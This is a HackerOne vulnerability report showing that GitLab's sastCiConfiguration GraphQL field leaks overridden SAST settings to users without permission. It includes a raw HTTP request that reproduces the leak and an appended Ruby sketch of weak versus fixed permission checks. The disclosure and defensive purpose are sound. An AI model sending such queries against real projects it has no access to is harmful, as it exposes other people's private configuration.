SAST CiConfiguration info visible of public/private project without permissions
HackerOne report #965602 by ashish_r_padelkar
on 2020-08-24, assigned to @ankelly:
Report
Summary
Hello,
You can override SAST config info here at https://gitlab.com/<NameSpace>/<ProjectName>/-/security/configuration
You can read more about it here how to do it in UI https://gitlab.com/help/user/application_security/sast/index#configure-sast-in-the-ui
The changed information shouldn't be visible to users without permissions. However, any user can see this information for any public project (with no repository access), and guest users can see it in private projects, using a GraphQL query.
Steps to reproduce
1. Login as Maintainer and go to your public project (with repositories restricted only to team members) https://gitlab.com/<NameSpace>/<ProjectName>/-/security/configuration and enable the SAST config using a merge request (change the default config).
2. Login as another user (who doesn't have any membership to the above project). You shouldn't see the SAST config change above, as you don't have access to repositories from the above project.
3. Just run the GraphQL query below using your CSRF token and cookies:
POST /api/graphql HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 703
accept: */*
X-CSRF-Token: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
content-type: application/json
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/group_new_1/project2/-/security/configuration/sast
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1
[{"operationName":"sastCiConfiguration","variables":{"fullPath":"group_new_1/project2"},"query":"query sastCiConfiguration($fullPath: ID!) {\n project(fullPath: $fullPath) {\n sastCiConfiguration {\n global {\n nodes {\n ...SastCiConfigurationEntityFragment\n __typename\n }\n __typename\n }\n pipeline {\n nodes {\n ...SastCiConfigurationEntityFragment\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment SastCiConfigurationEntityFragment on SastCiConfigurationEntity {\n defaultValue\n description\n field\n label\n type\n value\n __typename\n}\n"}]
4. Change the fullPath to the path of the public project and you should see the changed/overridden config in the response in Burp.
5. This also happens in private projects too, where guests are able to see this information.
What is the current bug behavior?
SAST config visible to other users without proper permissions
What is the expected correct behavior?
Only Developers and above roles should see this information in my opinion.
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 66a7f57b7dd
Regards,
Ashish
Impact
SAST config (changed values) is visible to users without permissions in public projects (with no repository access), and guest users are able to see this information in private projects too!
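As an added illustration (not GitLab's code and not part of the report), a minimal Ruby model of the field-level authorization gap described above: the permissive check that resolves the field for anyone who can read the project, beside a check that requires Developer or above as the reporter expects. The role table, Project/User structs and sample data are constructed assumptions.

```ruby
# Added illustration, not GitLab's code: a minimal model of the field-level
# authorization gap. Roles, Project and User are constructed assumptions.
ROLE_LEVELS = { none: 0, guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

Project = Struct.new(:path, :visibility, :members, keyword_init: true)
User    = Struct.new(:name, keyword_init: true)

def role_of(project, user)
  project.members.fetch(user.name, :none)
end

# A public project is readable by anyone; a private one only by members.
def can_read_project?(project, user)
  project.visibility == :public || role_of(project, user) != :none
end

def developer_or_above?(project, user)
  ROLE_LEVELS[role_of(project, user)] >= ROLE_LEVELS[:developer]
end

# Weak check (the behaviour the report describes): the field is resolved
# whenever the project itself is readable, so non-members of a public
# project and guests of a private project get the overridden config.
def sast_config_visible_weak?(project, user)
  can_read_project?(project, user)
end

# Hardened check (the reporter's expectation): Developer or above only.
def sast_config_visible_fixed?(project, user)
  can_read_project?(project, user) && developer_or_above?(project, user)
end

# Stand-in for the GraphQL resolver: returns the config, or nil when the
# caller is not authorized (GraphQL clients then see a null field).
def resolve_sast_ci_configuration(project, user, config, check:)
  send(check, project, user) ? config : nil
end

# Constructed sample data mirroring the report's two scenarios.
SAMPLE_CONFIG = { "field" => "EXAMPLE_VAR", "defaultValue" => "1", "value" => "overridden" }.freeze
PUBLIC_PROJECT  = Project.new(path: "group_new_1/project2", visibility: :public,
                              members: { "maintainer" => :maintainer })
PRIVATE_PROJECT = Project.new(path: "group/private", visibility: :private,
                              members: { "maintainer" => :maintainer, "guest" => :guest })
OUTSIDER   = User.new(name: "outsider")
GUEST      = User.new(name: "guest")
MAINTAINER = User.new(name: "maintainer")
```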